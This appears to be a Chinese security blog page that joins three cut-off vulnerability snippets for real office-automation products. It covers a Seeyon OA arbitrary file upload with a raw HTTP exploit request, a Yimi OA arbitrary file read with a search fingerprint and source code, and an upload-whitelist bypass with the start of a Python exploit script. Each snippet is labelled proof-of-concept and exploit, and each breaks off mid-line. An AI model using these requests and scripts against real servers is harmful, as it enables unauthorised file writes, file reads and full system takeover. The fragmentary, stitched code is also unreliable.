原理未授权访问文件上传点导致任意文件上传漏洞,目标文件的一个参数将文件经过。影响范围致远OA V8.0;致远OA V7.1、V7.1SP1;致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3;致远OA V6.0、V6.1SP1、V6.1SP2;致远OA V5.x;致远OA G6POC & EXP手工arguments接收一个Gzip压缩后再URL编码的字符串,payload中的恶意代码将在被解压之后写入指定文件中。POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1 Host: ip:port Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Prest
漏洞描述一米OA getfile.jsp文件过滤不足且对权限验证不严格,导致任意文件读取漏洞。漏洞影响一米OA网络测绘app="一米OA"漏洞复现出现漏洞的文件如下:<%@ page contentType="text/html;charset=utf-8" %> <%@page import="cn.js.fan.util.*" %> <%@page import="cn.js.fan.web.Global" %> <%@page import="com.redmoon.oa.*" %> <%@page import="java.io.*" %> <jsp:useBean id="fchar" scope="page" class="cn.js.fan.util.StrUtil"/> <jsp:useBean id="f
原理文件上传点存在一个白名单,在白名单之外的内容会被添加后缀并base64编码文件内容,编码后的文件会获得一个id,通过webmain/task/runt/qcloudCosAction.php中的qcloudCosAction类的run方法,提供对应的id即可复原后缀和内容,从而导致上传的文件被解析。危害攻击者可获得系统的完整访问权限。POC & EXPimport requests session = requests.session() url_pre = 'http://x.x.x.x/' url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953' url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913' url3 = url_pre + '/task.php?m=qcloudCos|runt&a=
Equinox
一个乐于分享的网安人